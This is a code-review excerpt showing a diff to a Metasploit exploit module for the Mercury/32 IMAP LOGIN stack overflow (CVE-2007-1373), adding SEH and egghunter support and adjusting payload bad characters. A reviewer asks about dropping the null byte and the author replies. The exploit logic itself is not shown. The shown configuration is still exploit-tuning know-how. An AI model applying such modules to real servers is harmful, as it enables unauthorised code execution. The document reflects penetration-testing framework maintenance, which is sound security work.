modules/exploits/windows/imap/mercury_login.rb

```diff
@@ -4,87 +4,83 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
-  Rank = AverageRanking
+  Rank = NormalRanking
 
   include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::Seh
+  include Msf::Exploit::Remote::Egghunter
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Mercury/32 LOGIN Buffer Overflow',
-      'Description'    => %q{
+      'Name' => 'Mercury/32 4.01 IMAP LOGIN SEH Buffer Overflow',
+      'Description' => '
         This module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD
         LOGIN verb. By sending a specially crafted login command, a buffer
         is corrupted, and code execution is possible. This vulnerability was
         discovered by (mu-b at digit-labs.org).
-      },
-      'Author'         => [ 'MC' ],
+      ',
+      'Author'         => 
+        [
+        'MC', # Discovery and Metasploit module
+        'Ivan Racic' # Automatic targeting + egg hunter
+        ],
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          [ 'CVE', '2007-1373' ],
-          [ 'OSVDB', '33883' ],
+          ['CVE', '2007-1373'],
+          ['OSVDB', '33883']
         ],
       'Privileged'     => true,
       'DefaultOptions' =>
         {
-          'EXITFUNC' => 'thread',
+          'EXITFUNC' => 'thread'
         },
       'Payload'        =>
         {
-          'Space'    => 800,
-          'BadChars' => "\x00\x0a\x0d\x20",
-          'StackAdjustment' => -3500,
+          'BadChars' => "\x0a\x0d\x20"
```

Comment:
Is `\x00` no longer a bad char?

Reply:
it seems so as it did not terminate the string after seh. however, will test once again. till then i will leave it as a bad char